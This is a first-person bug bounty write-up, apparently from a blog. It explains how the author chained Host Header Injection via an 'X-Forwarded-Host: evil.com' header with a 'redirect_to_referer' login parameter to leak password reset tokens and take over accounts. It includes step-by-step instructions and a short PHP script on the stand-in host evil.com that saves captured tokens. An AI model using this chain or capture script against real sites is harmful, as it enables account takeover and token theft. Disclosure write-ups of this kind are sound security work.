Love Story Of A Account Takeover (Chaining Host Header Injection To Takeover Someones Account)

First Write-up.
So Recently i was discovered a Host Header Injection [Ex: radiact.com].
Basically when i was testing for “Password Reset Function”.
I notice that we can Redirect by changing the name or adding a extra header “X-Forwarded-Host”. So changing this host to evil.com will redirect you to evil.com. But as we know reporting simple Host Header Injection with a redirection is not enough to make it more impact.


So i simply kept this aside and looking for more interesting behavior. I requested a reset token and tried to redirect and capture the referer but no luck. Well looking forward and i was noticed by a parameter called “redirect_to_referer=yes”. I dig into it and i understand that if we login with that parameter it will redirect us to the referer.



Well i visited our reset token which i generated before Let’s take it as “EX: radiact.com/reset?token=abc” and then i go back to the login panel and Sign In with my credentials and captured that request. After that i added “X-Forwarded-Host: evil.com” and Bingo!!! finally it was redirected to “evil.com/reset?token=abc”.


Now i generated a php script hosted on my “evil.com/reset/index.php
EX:
<?php
$x=$_GET[‘token’]
$file = fopen(“token.txt”,”w”);
echo fwrite($file,$x);
fclose($file);
?>
Now we simply created another trick to execute that attack more simply and more anonymously. We used a firefox extension to add a custom header only for “radiact.com/login”. So We added “X-Forwarded-Host: evil.com”. And then finally we can execute that attack. Let’s Start From The Beginning.

01. We Generated a reset token.
02. And then we visit that reset page.


03. Then we clicked on Sign In.
04. Then we put our credentials and hit submit.


05. Bingo We redirected to evil.com/reset?token=abc



NOTE: No need to intercept the request because we added a custom header via Firefox Extension So it will automatically execute.

06. Visit evil.com/token.txt
07. Welcome now you can pwned the account by resetting the password.





Hope you understand what i tried to explain. Sorry for my bad English experience.
Thanks For Reading This.
Take Care.

























Comments

Post a Comment